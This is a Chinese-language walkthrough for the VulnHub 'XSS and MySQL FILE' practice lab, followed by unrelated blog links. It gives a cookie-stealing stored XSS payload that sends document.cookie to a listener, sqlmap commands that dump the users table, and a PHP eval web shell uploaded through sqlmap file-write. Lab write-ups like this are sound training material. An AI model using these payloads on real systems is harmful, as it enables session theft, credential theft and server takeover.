XSS_and_Mysql_file靶场攻略

下载地址

https://download.vulnhub.com/pentesterlab/xss_and_mysql_file.iso

扫描ip

复制代码
arp-scan -l 

扫描端口

复制代码
nmap -sS -sV -p- 192.168.89.137

扫描目录

复制代码
dirsearch -u 192.168.89.137

访问80端口,点击测试

测试漏洞位置

复制代码
<script>alert(1)</script>

设置存储型xss,kali监听

复制代码
<script>document.write('<img src="http://192.168.89.137:8080/?' + document.cookie +'"/>');</script>
复制代码
python -m http.server 8080

一分钟左右会有cookie回显

登录admin

点击admin,随便输入账号密码抓包

修改cookie为kali监听到的,放行后可登录

点击edit,使用sqlmap注入

复制代码
sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch --dbs --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4"

sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch -D 'blog' --tables --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4"

sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch -D 'blog' -T 'users' --dump --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4"

得到账号密码

蚁剑shell

在kali创建一个php文件

复制代码
vim 1.php

<?php @eval($_POST['123456']);?>

使用sqlmap将文件放到网站

复制代码
sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4" --file-write /home/kali/1.php --file-dest /var/www/css/1.php

使用蚁剑连接

相关推荐
胡耀超14 分钟前
Web Crawling 网络爬虫全景:技术体系、反爬对抗与全链路成本分析
前端·爬虫·python·网络爬虫·数据采集·逆向工程·反爬虫
阿明的小蝴蝶18 分钟前
记一次Gradle环境的编译问题与解决
android·前端·gradle
Ruihong20 分钟前
【VuReact】轻松实现 Vue 到 React 路由适配
前端·react.js
山_雨21 分钟前
startViewTransition
前端
写代码的【黑咖啡】24 分钟前
Python Web 开发新宠:FastAPI 全面指南
前端·python·fastapi
凉_橙24 分钟前
gitlab CICD
前端
wangfpp26 分钟前
性能优化,请先停手:为什么我劝你别上来就搞优化?
前端·javascript·面试
踩着两条虫28 分钟前
AI 驱动的 Vue3 应用开发平台 深入探究(二十):CLI与工具链之构建配置与Vite集成
前端·vue.js·ai编程
凉_橙29 分钟前
前端项目与node项目部署记录
前端
踩着两条虫33 分钟前
AI 驱动的 Vue3 应用开发平台 深入探究(二十):CLI与工具链之自定义构建插件
前端·vue.js·ai编程